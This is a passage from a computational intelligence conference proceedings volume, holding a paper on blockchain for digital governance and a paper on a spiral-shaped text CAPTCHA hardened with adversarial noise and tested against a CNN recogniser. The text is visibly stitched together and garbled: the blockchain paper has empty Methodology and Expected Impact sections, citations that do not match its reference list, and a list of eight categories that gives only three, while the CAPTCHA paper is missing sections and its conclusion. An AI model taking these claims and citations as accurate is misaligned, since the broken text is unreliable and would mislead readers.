12. Alzubi, O. (2020). Deep learning-based intrusion detection model for industrial wireless sensor
networks. Journal of Intelligent & Fuzzy Systems, In press.
13. Gupta, D., Rodrigues, J. J. P. C., Sundaram, S., Khanna, A., Korotaev, V., & Albuquerque,
V. H. C. (2018). Usability feature extraction using modified crow search algorithm: A novel
approach. Neural Computing and Applications. https://doi.org/10.1007/s00521-018-3688-6.
Secured Information Infrastructure
for Exchanging Information for Digital
Governance
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 59
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_5
60 M. S. Alias and S. B. Goyal
1 Introduction
Blockchain, which was proposed in 2008 by Satoshi Nakamoto for the
financial sector [1], is considered to be one of the extensive, disruptive fourth indus-
trial revolution technologies [2]. A blockchain is a cryptographically linked record of
transactions replicated across several computers in a peer-to-peer network.
Blockchain uses an asymmetric cryptography mechanism to confirm the authen-
ticity of transactions [3]. In general, blockchain allows transactions to be exchanged
effectively between two or more parties in a virtual decentralized ledger without the
need for intermediaries [4]. A blockchain is a distributed ledger that accomplishes the
following:
i. Records any transaction or data securely, permanently, and immutably.
ii. Uses one-way hash cryptography that is computationally imprac-
tical to break.
iii. Is visible to all users with permission.
iv. Uses peer-to-peer transmission, with each node forwarding new
transaction data to all the others.
v. Can trigger transactions automatically, based on business
logic and custom algorithms.
vi. Verifies transactions via node consensus, without reliance on third-
party intermediaries.
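The hash-linking behind properties (i) and (ii) can be illustrated with a toy Python sketch. This is not a production blockchain (proof of work, signatures, and networking are all omitted); it only shows how each block commits to its predecessor's hash, so that tampering with any recorded transaction breaks the chain.

```python
import hashlib
import json

def block_hash(data, prev_hash):
    # One-way SHA-256 hash over the block contents and the back-link.
    payload = json.dumps({"data": data, "prev_hash": prev_hash}, sort_keys=True)
    return hashlib.sha256(payload.encode()).hexdigest()

def make_block(data, prev_hash):
    return {"data": data, "prev_hash": prev_hash,
            "hash": block_hash(data, prev_hash)}

genesis = make_block("genesis", "0" * 64)
b1 = make_block("Alice pays Bob 5", genesis["hash"])
b2 = make_block("Bob pays Carol 2", b1["hash"])
chain = [genesis, b1, b2]

def verify(chain):
    # Recompute every hash and check every back-link; tampering with any
    # recorded transaction invalidates the chain from that point onward.
    for prev, blk in zip([None] + chain, chain):
        if blk["hash"] != block_hash(blk["data"], blk["prev_hash"]):
            return False
        if prev is not None and blk["prev_hash"] != prev["hash"]:
            return False
    return True

print(verify(chain))                # True
b1["data"] = "Alice pays Bob 500"   # tamper with a recorded transaction
print(verify(chain))                # False
```
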
A consensus mechanism is presented as a "compromise method" that allows peer-to-peer
network clients to verify transactions and update the ledger across the network [6]. The
consensus mechanism is used to establish trust in the accuracy of data on a system that
has historically been maintained by a single person or administrator. A consensus
approach is a process in which the nodes in a shared network agree on proposed activities. This
comes with a way of keeping records within a ledger that ensures complete and
consistent transaction records. Permission methods are further governed by network
rules and agreements that allow transactions to be documented, finalized, and executed
subject to certain conditions. Therefore, transactions can be agreed upon, creating a
chain of transactions similar to a ledger. In blockchains, transactions are integrated into
a newly mined block that is linked to the previous block. In the context of Bitcoin, after
a fixed interval of time, a new block is created, appended as a blockchain transaction, and
verified throughout the network. This series of blocks is known as the blockchain.
Another key feature supported by many blockchains is smart contracts.
Smart contracts are pieces of software that perform different functions depending
on the state of the system or on events that occur. A smart contract is a computer
program or protocol that facilitates, validates, or enforces the terms of an agreement
[7]. Smart contracts run on the distributed ledger and do not require human intervention.
With built-in assumptions, smart contracts typically execute financial transactions
in cryptocurrency without intentional or unintentional errors [8]. Smart contracts can be
seen as private regulatory bodies that refer to a set of rules governing transactions
between the interested parties. Once deployed, smart contracts do not change and are
binding, which raises, but does not resolve, the problem of dealing with damage caused
by malfunctions or code errors. A smart contract is written in formal, objective statements.
In a conventional system, the true intent can be judged by a mediator in the event of
a dispute. In a permissionless blockchain system, however, there is no independent
arbitrator, and personal intent cannot be inferred from computer code. While it may not
completely solve the problem of finding a superior arbitrator, a private blockchain system
can grant rights to test programs and to approve or reject certain transactions.
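A smart contract of the kind described can be caricatured as a small deterministic state machine whose rules are fixed at deployment and need no mediator. The escrow example below is purely illustrative: real smart contracts run on a blockchain virtual machine (such as Ethereum's), not as ordinary Python, and the two-party release rule is an assumed toy policy.

```python
class EscrowContract:
    """Toy escrow: funds release only when both parties have approved."""

    def __init__(self, amount):
        self.amount = amount
        self.approvals = set()
        self.state = "LOCKED"

    def approve(self, party):
        if self.state != "LOCKED":
            raise RuntimeError("contract already settled")
        self.approvals.add(party)
        # The release rule is fixed at deployment; no human intervention
        # or arbitrator decides when funds move.
        if {"buyer", "seller"} <= self.approvals:
            self.state = "RELEASED"

contract = EscrowContract(amount=100)
contract.approve("buyer")
print(contract.state)   # LOCKED
contract.approve("seller")
print(contract.state)   # RELEASED
```

The binding, non-modifiable character of deployed contracts discussed above corresponds here to the rule in `approve` being unchangeable once the object exists, for better or, in the case of buggy rules, for worse.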
Nodes at various locations validate transactions and capture data in a consistent
manner across the network. Any participant with the appropriate access rights may
retrieve any record in real time, at any point in its history, from any actor in the network
intending to transact, using public-key cryptography. Exchange arrange-
ments are quickly established between related peers and are consistently verified by
algorithms across the network.
2 Literature Survey
Digital governance, formerly known as e-governance, refers to the use
of ICT to promote modern, efficient, and effective governance and to facilitate access to
governance information and services. It includes the implementation of ICT in the
management of the public sector, which may improve public
services and processes. E-governance is a broad term that encompasses the operation
of national institutions, electoral strategies, and the relationship between government
and the general public. Digital management has organizational, administrative, and
technical aspects in eight broad categories, which include:
i. Governance-to-citizen: Provides well-known online social services, espe-
cially electronic delivery of services related to transactions and information exchange.
ii. Citizen-to-governance: Offers the general public online contributions, especially
electronic delivery by providers in exchange for other transactions and
communications.
iii. Governance-to-business: Helps to drive e-transaction projects, such as e-
procurement.
3 Problem Statement
This paper aims to clarify how research on blockchain technology in digital
governance has been conducted, following Okoli and Schabram's guide [10], by carrying
out systematic reviews. The guide contains specific activities, including the development
of an evaluation protocol, which covers subject selection, data extraction, and the
reporting of results, as a basis for answering the following research questions:
i. How has blockchain technology been researched in the context of digital
governance?
ii. What are the possibilities, challenges, and consequences identified in the
studies on blockchain technology for digital governance?
iii. How could blockchain technology benefit public administration in the context
of reform frameworks?
iv. What are the current public administration reform frameworks?
v. How does blockchain fit into the narrative of the contemporary public
administration reform framework?
vi. What are the potential use cases of blockchain in the context of public
administration?
4 Hypothesis
Security requirements are changing rapidly in systems distributed across special-
ized organizations, as each organization desires a better way to manage its
self-regulated access rights [6]. Organizations often retain and revoke the right to
access data managed on central servers when using encrypted structures. System
integration controls customer permissions through internal authentication [5].
The conceptualization of this paper is expressed in terms of the following research
hypotheses:
i. The adoption of state-of-the-art blockchain technology signifi-
cantly improves the efficiency and security of the record infrastructure in digital
governance.
ii. Blockchain technology has a positive impact on the relationship between the
access control system and the e-governance system.
iii. Smart contracts have a positive effect on the relationship between the
access control system and the benefits of public administration.
iv. The distributed ledger has a positive effect on the relationship between the
access control infrastructure and the digital governance system's data.
v. Blockchain technology is reorganizing record regulation within
governance frameworks.
5 Methodology
6 Expected Impact
7 Conclusion
Programs designed for blockchain will be able to reduce the cost of connecting
devices and free distributed networks from a single point of failure, without
a centralized authority controlling data across domains. In a smart envi-
ronment, devices can manage themselves and therefore require less external
intelligence. As a rule, routine work can be automated, operating costs reduced, and
service delivery managed efficiently through a real-world blockchain. Blockchain dissemi-
nates data so that the negative effects of hacking can be minimized. Besides, every action
on the blockchain is recorded and visible to every user. Under such mass surveillance,
misbehavior is difficult to conceal.
References
1. Gartner. (2018). Preparing for smart contract adoption. Retrieved February 7, 2019 from
https://www.gartner.com/doc/3894102/preparing-smart-contractadoption
2. Okoli, C., & Schabram, K. (2011). A guide to conducting a systematic literature review of
information systems research. In Working Papers on Information Systems: Sprouts. ISSN 1535-
6078
3. Aitzhan, N. Z., & Svetinovic, D. (2018). Security and privacy in decentralized energy trading
through multi-signatures, blockchain and anonymous messaging streams. IEEE Transactions
on Dependable and Secure Computing, 15(5), 840–852.
4. Wright, A., & De Filippi, P. (2015). Decentralized blockchain technology and the rise of lex
cryptographia. SSRN.
5. Back, A., Corallo, M., Dashjr, L., Friedenbach, M., Maxwell, G., Miller, A., & Timón, J.
(2014). Enabling blockchain innovations with pegged sidechains. Open Science Review.
6. Ao, X., & Minsky, N. H. (2003). Flexible regulation of distributed coalitions. Lecture Notes
Computer Science, 2808, 39–60.
7. Swan, M. (2015). Blockchain: Blueprint for a new economy (1st edn). Safari Tech Books
Online. Beijing: O’Reilly.
8. Antonopoulos, A. M., & Wood, G. (2018). Mastering ethereum: Building smart contracts and
DApps (1st edn). Sebastopol: O’Reilly Media.
9. Hu, V. C., Ferraiolo, D. F. & Kuhn, D. R. (2006). Assessment of access control systems.
Interagency Report 7316, NIST.
10. Warburg, B. (2016). How the blockchain will radically transform the economy [TED talk].
Retrieved from https://www.youtube.com/watch?v=RplnSVTzvnU
Spiral CAPTCHA with Adversarial
Perturbation and Its Security Analysis
with Convolutional Neural Network
Abstract Human or bot? This is the first question that comes to mind before deploying web
services. A Completely Automated Public Turing test to tell Computers and Humans
Apart (CAPTCHA) is a tool generally used to boost the security of web
services by conducting a challenge-response test. This test helps to determine whether
incoming requests are from legitimate users or from intelligent bots. A bot finds it difficult to
recognize distorted words that humans can easily read. There are two major
aspects of a CAPTCHA: it must be easily identified by humans, and it must be able to
prevent bot attacks. This paper presents a new text-based CAPTCHA design called
Spiral CAPTCHA with an immutable adversarial noise (IAN) and validates it against
convolutional neural network (CNN) attacks. The new text-based "Spiral
CAPTCHA" is designed using PHP, and a dataset of 16,384 images has been created.
The proposed CAPTCHA has also been tested for its security against the convolutional
neural network "AlexNet." For evaluation purposes, the CNN model was trained with a
dataset containing 8027 images and validated using 3441 images. Testing of the model was
performed by randomly choosing batches of 64, 128, 256, and 512 images from
a test dataset of 4916 images. For robustness checking against recognition, we
initially tested the CAPTCHA without any noise and later checked it with noise. Finally, the
proposed CAPTCHA is evaluated using recognition rate, recognition speed, attack
speed, and success rate. The maximum recognition rate achieved is 38.48% without
perturbation and 13.50% with perturbation. However, the success
rate is very low (almost 0%) in both cases, which confirms that the proposed
CAPTCHA is robust against recognition attacks.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 67
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_6
68 Shivani and C. R. Krishna
1 Introduction
Von Ahn et al. introduced the concept of CAPTCHA, a challenge-response
human intelligence test that is considered easy for humans to pass but difficult for
intelligent machines. It acts as a hurdle for bots or automated programs, preventing
them from exploiting essential web services [1].
Humans can solve CAPTCHAs with 90% accuracy, whereas bots can solve them with
only up to a 1% success rate, which makes them a good security measure for protection
against malicious programs [2].
The major web services secured by CAPTCHAs are: online registration forms,
comments on various blogs and websites, online polls, and email accounts.
A machine by itself is incapable of distinguishing a human from a bot. A typical CAPTCHA
process involves a session in which automated questions are generated by the system and
presented to a user. The original identities of the responders (humans or bots) are
hidden from the system, which recognizes the user by analyzing the responses. Another way
is to provide a question set that can easily be solved by humans but is a
challenging job for bots. The major question categories are: object identification
in a picture, labeling an image, recognizing words in speech, puzzle solving, eye
CAPTCHA, pedometric CAPTCHA, and text recognition. Among the various types of
CAPTCHAs, the text-based CAPTCHA is the most commonly used. It can be
generated at low cost in virtually unlimited numbers, and text-based
CAPTCHAs do not require any storage because they use a simple combination of
alphanumeric symbols [3].
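The low generation cost is easy to see: producing the alphanumeric challenge string is a few lines of code. The sketch below is only an illustration in Python (the paper's generator is written in PHP, and the rendering and distortion steps are omitted); the character set and length are arbitrary choices.

```python
import secrets
import string

def captcha_text(length=6):
    # Drop visually ambiguous characters such as 0/O and 1/l/I, a common
    # usability choice; secrets gives unpredictable challenges.
    alphabet = "".join(c for c in string.ascii_uppercase + string.digits
                       if c not in "0O1I")
    return "".join(secrets.choice(alphabet) for _ in range(length))

challenge = captcha_text()
print(challenge)
```

Because no image bank is stored, a fresh challenge can be drawn per request without ever exhausting the space of strings.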
To improve security and reduce the breaking rate, text-based CAPTCHAs are hardened by applying distortions, noise, hollow characters, character isolation, variable-length strings, character overlapping, noise arcs, complicated backgrounds, two-layer structures, etc. [4]. However, since the deployment of deep learning models such as convolutional neural networks (CNNs), they can be broken easily. Furthermore, K-nearest neighbors (KNN) and support vector machine (SVM) models can identify even complicated texts effectively [5–7]. Deep learning (DL) has narrowed the identification gap between humans and bots on such traditional problems. Due to advancements in artificial intelligence (AI), several researchers claim that DL would lead CAPTCHA to an "end" [8]. Text-based CAPTCHAs use a simple left-to-right writing scheme, which enables DL networks to locate the starting point easily; therefore, pre-processing attacks and segmentation can be performed easily.
Deep learning performs speech processing and image recognition with human-level competency. However, unlike humans, it still suffers from an important deficiency: vulnerability to adversarial attacks. Adversarial examples are misclassified by machine learning (ML) and DL models [9]. This weakness can be exploited to enhance CAPTCHA security, causing attacking models to misclassify the CAPTCHA [10].
Based on the above-mentioned issues, researchers have developed two-layer CAPTCHAs, crowded characters, hollow schemes, etc., to overcome these security issues [7, 11]. To be considered secure, a CAPTCHA should provide robustness
Spiral CAPTCHA with Adversarial Perturbation and Its Security … 69
2 Related Work
Lee et al. [15] proposed an attack-resistant model that ensures user participation using visual secret sharing for secure human interaction. If a user fails to prove that they are human, the system aborts the process, providing security with the help of the CAPTCHA. The simulation outcomes validate the authentication accuracy among users in terms of practicability.
Castro et al. [16] presented an analysis of the Capy CAPTCHA, a human interactive proof (HIP) based on a puzzle-completion model. To overcome the shortcomings of conventional CAPTCHAs, a low-cost Joint Photographic Experts Group (JPEG) compression model was utilized to evaluate image continuity. The investigation attained a 65% success rate and a 20% breaking rate.
70 Shivani and C. R. Krishna
Gao et al. [17] proposed an attack to evaluate the security of the two-layer CAPTCHA developed by Microsoft. Empirical studies demonstrate the efficiency of the proposed attack using CNN and KNN models, with a 44.6% success rate. They further provided suggestions for developing improved CAPTCHAs with better security.
Zhu et al. [18] introduced a security model named CAPTCHA as graphical passwords, which uses hard AI problems to enhance online security. It combines a CAPTCHA with a graphical password model and also addresses several security attacks and image hotspot issues. The simulation analysis demonstrated both its usability and its security.
Beheshti et al. [19] developed a Visual Integration CAPTCHA (VICAP) model that exploits the Human Visual System's (HVS) ability to combine the complicated data available in single frames through the trans-saccadic memory technique. It also combines visual resolution to provide image continuity. By tuning the Original-to-Random-Output ratio to 40%, it guarantees usability and attains a success rate of 99% with a breaking rate of 0% in the single-frame environment and 50% in the multi-frame environment.
Ogiela et al. [20] presented a visual CAPTCHA generation technique with various text formats integrated into a persistent background. They assessed the flaws and strengths of the proposed CAPTCHA using various image detection methodologies, particularly pattern recognition models, to ensure its security. These CAPTCHA models were designed specifically for Cloud of Things applications. Furthermore, cognitive CAPTCHAs were also introduced to enhance security.
Khattar et al. [21] proposed a plug-n-play adversarial attack (PPAA) in which the perturbation was generated using constrained uniform random noise. They tested their approach on the Microsoft Common Objects in Context dataset with the RetinaNet object detection algorithm and achieved a 96.48% success rate.
Wang et al. [22] proposed a transfer-learning approach for attacking CAPTCHAs. Their scheme reduces the attack complexity and the sample-labeling cost. The authors attacked 25 online CAPTCHAs and attained success rates from 36.3% to 96.9%.
Kirkbride et al. [23] presented a novel data collection technique using game-like CAPTCHAs. The collected data is used to reveal fake account use by creating a behavioral biometric; they presented game-like CAPTCHAs as a solution for generating interactive biometric data.
Noury et al. [24] developed a CNN-based Deep-CAPTCHA to investigate design shortcomings of alphanumeric CAPTCHAs. They achieved a network attack accuracy of 98.31% on alphanumeric data and 98.94% on numerical data.
Jafar et al. [25] developed a method for predicting brain tumors and their locations using mathematical analysis and machine learning techniques, claiming that the approach gives good accuracy and results.
In this paper, a new technique named "Spiral CAPTCHA" is proposed for writing text-based CAPTCHAs. A Spiral CAPTCHA resembles a spiral shape that starts at the center and grows radially outward, clockwise or anticlockwise. Figure 1a shows the spiral shape, Fig. 1b shows the proposed Spiral CAPTCHA with arcs as noise, and Fig. 1c shows its resemblance to the spiral shape. The figures illustrate how the letters in a Spiral CAPTCHA originate from the center like a spiral and move radially outward in the clockwise direction.
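The paper does not give the exact character-placement algorithm; as an illustrative sketch, the spiral reading order can be modeled as walking a character grid outward from the center in the clockwise direction. The grid size, layout, and helper names below are assumptions, not the authors' implementation:

```python
def spiral_coords(rows, cols):
    """Yield (r, c) coordinates spiralling clockwise outward from the grid center."""
    r, c = rows // 2, cols // 2
    yield r, c
    # Clockwise outward walk: right, down, left, up, with growing run lengths.
    moves = [(0, 1), (1, 0), (0, -1), (-1, 0)]
    step, i, emitted = 1, 0, 1
    while emitted < rows * cols:
        for _ in range(2):            # each run length is used twice
            dr, dc = moves[i % 4]
            for _ in range(step):
                r, c = r + dr, c + dc
                if 0 <= r < rows and 0 <= c < cols:
                    yield r, c
                    emitted += 1
            i += 1
        step += 1

def spiral_read(grid):
    """Read the non-empty cells of a character grid in clockwise spiral order."""
    rows, cols = len(grid), len(grid[0])
    return "".join(grid[r][c] for r, c in spiral_coords(rows, cols) if grid[r][c])

# Hypothetical 3x3 layout of the CAPTCHA text "5VLF8P" from the paper's example:
# the first character sits at the center and the rest wind outward clockwise.
layout = [[None, None, None],
          ["P",  "5",  "V"],
          ["8",  "F",  "L"]]
```

Reading `layout` with `spiral_read` recovers the text in the order a human is instructed to read it: from the center, clockwise.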
The Spiral CAPTCHA is perturbed with immutable adversarial noise (IAN) [10] and tested for its security against a CNN, with and without noise. IAN uses the Fast Gradient Sign Method (FGSM) followed by a 5 × 5 median filter, applied iteratively with increasing values of epsilon (the noise factor) until the network predicts the wrong target. FGSM computes the signed gradient of the loss with respect to the input image, which is used to induce the perturbation in the image. The main advantage of this perturbation is that a user barely notices any difference between the actual and the perturbed image.
The noise factor is increased step-wise, and the whole image is passed through the median filter. The resulting image is passed to the CNN for prediction, and the process is repeated with increased values of epsilon until the prediction is wrong. The proposed CAPTCHA is expected to provide two-way security: first, against segmentation attacks, because it uses an unconventional writing scheme (spiral instead of left-to-right), which prevents CNN networks from easily recognizing the starting point of the CAPTCHA; and second, through the intelligent perturbation used in the CAPTCHA, which causes the CNN to misclassify it.
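The iterative perturbation loop described above can be sketched as follows. This is a minimal illustration, not the authors' code: `predict` and `grad_sign` are hypothetical stand-ins for the CNN's forward pass and the FGSM gradient-sign computation, and the epsilon schedule follows the values reported later in the paper (0.15 to 2.95 in steps of 0.20):

```python
import numpy as np

def median_filter5(img):
    """Naive 5x5 median filter (edge pixels use the available neighborhood)."""
    h, w = img.shape
    out = np.empty_like(img)
    for r in range(h):
        for c in range(w):
            patch = img[max(r - 2, 0):r + 3, max(c - 2, 0):c + 3]
            out[r, c] = np.median(patch)
    return out

def immutable_adversarial_noise(img, true_label, predict, grad_sign,
                                eps_start=0.15, eps_step=0.20, eps_max=2.95):
    """Sketch of the IAN loop: FGSM perturbation followed by a 5x5 median
    filter, repeated with a growing noise factor epsilon until the model
    mispredicts. Returns the fooling image and the epsilon that achieved it."""
    eps = eps_start
    while eps <= eps_max:
        perturbed = median_filter5(img + eps * grad_sign(img, true_label))
        if predict(perturbed) != true_label:
            return perturbed, eps      # model fooled at this noise factor
        eps += eps_step
    return None, None                  # no fooling epsilon found in range
```

In the paper's setup the loop would stop at the smallest epsilon that makes the CNN mispredict, with 1.35 later chosen as the usability threshold.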
This research is inspired by two sources: first, "Microsoft's two-layer CAPTCHA" (Fig. 2) [17], in which a six-character text CAPTCHA is written in two rows, three letters in the first row and the remaining three in the second, using a mix of hollow characters and character overlapping; and second, the "immutable adversarial noise" of Osadchy et al. [10, 17].
The proposed work has been implemented with the following step-by-step procedure. The CAPTCHA is generated as a grayscale image, because image pre-processing converts a colored image into grayscale [4]; colors therefore lose their meaning in the very first step of image processing by a CNN. A dummy web page was created using PHP to display the CAPTCHA image and its usage, and a XAMPP server was used to host the web page locally. Figure 3 shows the web layout of the proposed CAPTCHA. As shown in the figure, users are guided by an instruction placed below the CAPTCHA image: "Enter from center in clockwise direction." One task is left to the user: finding the center of the image. For example, the CAPTCHA image on the above-mentioned web page reads "5VLF8P" when read from the center in the clockwise direction.
A dataset of 16,384 images in PNG format was created, of which 8027 images were used for training, 3441 for validation, and the remaining 4916 for testing. Every image is saved with its characters, in sorted form, as the image label, as shown in Fig. 4.
Instead of using a pre-trained network, a new AlexNet-style CNN (Fig. 5) was built with three convolution layers, three max-pooling layers, and two fully connected layers.
A single-channel input image of size 120 × 150 pixels was passed to the network. The model was run for 10 and 50 epochs.
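The paper does not state the convolution kernel sizes or strides; assuming the common 3 × 3 'same'-padded convolutions and 2 × 2 max pooling with stride 2, the feature-map sizes can be traced as in the following sketch (illustrative, not the authors' exact architecture):

```python
def conv2d_same(h, w):
    """A 3x3 convolution with 'same' padding keeps the spatial size (assumption)."""
    return h, w

def max_pool2(h, w):
    """A 2x2 max pooling with stride 2 halves each spatial dimension."""
    return h // 2, w // 2

def spiral_captcha_cnn_shapes(h=120, w=150):
    """Trace feature-map sizes through the 3-conv / 3-pool network described
    in the paper; two fully connected layers follow the flattened output."""
    shapes = [("input", (h, w))]
    for i in range(3):
        h, w = conv2d_same(h, w)
        shapes.append((f"conv{i + 1}", (h, w)))
        h, w = max_pool2(h, w)
        shapes.append((f"pool{i + 1}", (h, w)))
    shapes.append(("flatten", h * w))   # per feature channel
    return shapes
```

Under these assumptions the 120 × 150 input shrinks to 60 × 75, 30 × 37, and finally 15 × 18 after the three pooling stages, giving 270 spatial positions per channel at the flatten step.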
Our dataset was passed through the CNN for training, validation, and testing. We used a laptop with a 2.59 GHz Intel Core i7 processor and 4 GB RAM running the Windows 10 64-bit operating system. Python 3.7 was used with Keras and TensorFlow 2.1.0 as the backend. The CNN was trained on the 8027-image dataset, validated on 3441 images, and tested on randomly chosen batches of 64, 128, 256, and 512 images from the testing dataset of 4916 images. Predictions for a few images without added perturbation are shown in Fig. 6.
The testing images were then perturbed with the IAN described in the previous section and tested against the CNN for recognition. The perturbed image and the original image look almost the same, and a user can easily recognize the image without any difficulty, but for the CNN the perturbation leads to misclassification. Images without and with perturbation can be seen in Fig. 7 for noise factors up to 2.95.
Fig. 7 (a) Plain image, (b) perturbation, (c)–(p) perturbed images with epsilon increasing from 0.35 to 2.95 in steps of 0.20
Of these, epsilon = 1.35 (Fig. 7h) is chosen as the threshold value for the proposed work, because noise above that level becomes clearly visible to the user and thus defeats its purpose of remaining unnoticed. Figure 8 shows the CNN's predictions on perturbed images with an epsilon value of 1.35.
4 Performance Parameters
a. Recognition Rate (RR): It is defined as the percentage of characters recognized correctly per CAPTCHA and is given by Eq. 1.

RR = (Nr / Nn) × 100 (1)
b. Recognition Speed (RS): It is defined as the average time to recognize an individual character and is given by Eq. 2.

RS = Ta / Nn (2)
c. Success Rate (SR): It is defined as the percentage of full CAPTCHAs recognized correctly by the CNN and is given by Eq. 3.

SR = (Nrc / N) × 100 (3)
d. Attack Speed (AS): It is defined as the total time taken to recognize a full CAPTCHA.

where
Nr: number of characters recognized correctly per CAPTCHA,
Nn: total number of characters per CAPTCHA,
Ta: time taken to recognize all characters in a CAPTCHA,
Nrc: number of CAPTCHAs recognized correctly by the CNN,
N: total number of CAPTCHAs in the dataset.
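The four parameters above can be computed from attack results as in the following sketch, which assumes equal-length CAPTCHAs and averages over a test batch; the helper name and interfaces are illustrative, not from the paper:

```python
def captcha_attack_metrics(results, total_time):
    """Compute RR, RS, SR, and AS for a batch of attacked CAPTCHAs.
    `results` is a list of (predicted, actual) text pairs; `total_time`
    is the time spent recognizing all characters (the paper's tables
    report it in microseconds)."""
    n_chars = sum(len(actual) for _, actual in results)
    n_correct_chars = sum(p == a for pred, actual in results
                          for p, a in zip(pred, actual))
    n_correct_captchas = sum(pred == actual for pred, actual in results)

    rr = n_correct_chars / n_chars * 100           # Recognition Rate, Eq. 1
    rs = total_time / n_chars                      # Recognition Speed, Eq. 2
    sr = n_correct_captchas / len(results) * 100   # Success Rate, Eq. 3
    attack_speed = total_time / len(results)       # Attack Speed per CAPTCHA
    return rr, rs, sr, attack_speed
```

Note that SR counts only fully correct CAPTCHAs, which is why it can be 0% even when RR (per-character accuracy) is well above zero, as in the results below.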
Results for the proposed CAPTCHA were obtained, with and without noise, for the parameters mentioned in the previous section. Testing was performed on randomly permuted images from the 4916 test samples in batches of 64, 128, 256, and 512, initially for 10 epochs and then for 50. The following results were found:
Table 1 shows the results of the four analysis parameters for the images without perturbation. For both 10 and 50 epochs, all four parameters show only small variation across all batch sizes (64–512). For images without perturbation, the recognition rate (RR) reaches a maximum of 38.48% at 10 epochs with a 256-image batch and a minimum of 33.33% at 50 epochs with a 64-image batch. The success rate (SR) has a maximum of 0.19% for batch size 512 at both 10 and 50 epochs. Recognition speed (RS) and attack speed (AS) are fastest at 798 and 4787 microseconds, respectively, on batch size 64 at 50 epochs, and slowest at 1807 and 10,842 microseconds on batch size 128 at 10 epochs.
Table 2a shows the RR and SR results for perturbed images. The minimum RR is 11.48%, obtained with batch size 64, epsilon 2.35 and 50 epochs, and the maximum is 29.82%, obtained with batch size 128, epsilon 0.15 and 10 epochs. However, we take 13.50% (batch size 512, epsilon 1.35, 10 epochs) as the effective maximum RR, because we consider 1.35 the threshold value of epsilon: beyond this value the noise becomes clearly visible and the user can easily notice it, while our aim is that the noise should not be noticed by the user. SR is 0% in all cases, which means that no perturbed image is fully recognized by the CNN. In Table 2b, RS and AS are fastest at 802 and 4812 microseconds, respectively, on batch size 64 for epsilon 2.35, but we select 899 and 5395 microseconds on batch size 256 for epsilon 0.95 due to the epsilon threshold.
To check the usability of the proposed CAPTCHA, a survey was performed with 130 third- and fourth-year engineering students along with 50 general office staff with no
Table 2 a Recognition rate and success rate for Spiral CAPTCHA with perturbation
Epochs → 10 50
Batch size → (%) 64 128 256 512 64 128 256 512
RR Epsilon
0.15 28.65 29.82 29.36 27.60 25.78 29.30 29.69 28.81
0.35 23.96 25.52 25.59 23.57 21.88 24.74 25.85 25.26
0.55 19.27 20.96 21.42 19.99 19.01 21.61 23.05 21.10
0.75 18.23 18.75 19.47 17.90 17.71 18.88 20.77 19.86
0.95 16.93 17.06 18.03 16.47 17.45 17.06 19.21 18.36
1.15 15.63 15.49 16.02 14.84 15.63 15.50 16.99 16.70
1.35 14.32 14.19 14.45 13.50 13.80 14.20 15.49 15.40
1.55 13.97 13.45 14.09 13.05 12.77 13.64 14.75 15.03
1.75 13.23 13.65 13.95 13.40 12.25 14.14 14.40 14.57
1.95 12.85 12.64 13.90 12.52 12.91 13.57 14.88 14.33
2.15 11.90 12.41 12.20 12.47 12.87 12.27 14.85 13.12
2.35 11.67 11.74 12.96 11.76 11.48 12.29 15.48 13.43
SR 0.15 0 0 0 0 0 0 0 0
0.35 0 0 0 0 0 0 0 0
0.55 0 0 0 0 0 0 0 0
0.75 0 0 0 0 0 0 0 0
0.95 0 0 0 0 0 0 0 0
1.15 0 0 0 0 0 0 0 0
1.35 0 0 0 0 0 0 0 0
1.55 0 0 0 0 0 0 0 0
1.75 0 0 0 0 0 0 0 0
1.95 0 0 0 0 0 0 0 0
2.15 0 0 0 0 0 0 0 0
2.35 0 0 0 0 0 0 0 0
b Recognition speed and attack speed for Spiral CAPTCHA with perturbation
Epochs → 10 50
Batch size → (µs) 64 128 256 512 64 128 256 512
RS 0.15 958 912 931 1026 1144 947 950 929
0.35 1004 947 922 981 1087 916 911 941
0.55 966 913 926 999 1282 948 909 964
0.75 990 920 942 978 1082 929 911 961
0.95 1000 925 899 937 1280 937 916 949
1.15 1013 936 928 952 1198 903 914 956
1.35 980 950 929 918 1154 916 955 957
1.55 1102 1007 897 1186 801 1098 1151 1154
1.75 988 941 929 1055 951 836 1037 878
1.95 1086 1176 960 897 961 1055 1006 996
2.15 1200 917 903 834 923 909 1132 970
2.35 1073 1077 928 1143 802 1009 803 949
AS 0.15 5748 5475 5584 6157 6866 5681 5103 5574
0.35 6022 5684 5533 5887 6527 5498 5464 5648
0.55 5797 5476 5557 5993 7690 5687 5456 5785
0.75 5942 5523 5651 5866 6494 5572 5468 5767
0.95 5998 5553 5395 5621 7682 5621 5495 5695
1.15 6077 5617 5567 5713 7188 5416 5486 5737
1.35 5882 5697 5576 5509 6927 5497 5732 5704
1.55 6612 6042 5382 7116 4806 6588 6906 6924
1.75 5928 5646 5574 6330 5706 5016 6222 5268
1.95 6516 7056 5760 5382 5766 6330 6036 5976
2.15 7200 5502 5418 5004 5538 5454 6792 5820
2.35 6438 6462 5568 6858 4812 6054 4818 5694
Note: An SR of 0% for all values of epsilon and all batch sizes shows that the CNN did not predict any Spiral CAPTCHA image correctly.
The security of the Spiral CAPTCHA can be assessed by analyzing the results of Tables 1 and 2a, b. Both show that the success rate for guessing the CAPTCHA is 0% in almost all cases, which indicates that the proposed CAPTCHA is robust against recognition attacks.
The Spiral CAPTCHA shows a maximum success rate of 0.19% for images without perturbation and 0% for images with perturbation. This shows that the spiral shape, together with the IAN added to the CAPTCHA, makes it strong enough to withstand recognition attacks. It can also be seen that the Spiral CAPTCHA is more secure than the other CAPTCHA schemes examined by Tang et al. [4], who attacked the CAPTCHA schemes of the top 50 websites and attained good success rates against them. The attack success rates for the various schemes are shown in Table 4.
The lowest of those success rates, 10.0%, is against reCAPTCHA, whereas the maximum success rate against the Spiral CAPTCHA is only 0.19%, for images without perturbation. Hence, the Spiral CAPTCHA can be considered more secure than the presently available CAPTCHA schemes: designing the CAPTCHA with a spiral shape and adding intelligent perturbation makes it robust against recognition attacks.
7 Concluding Remarks
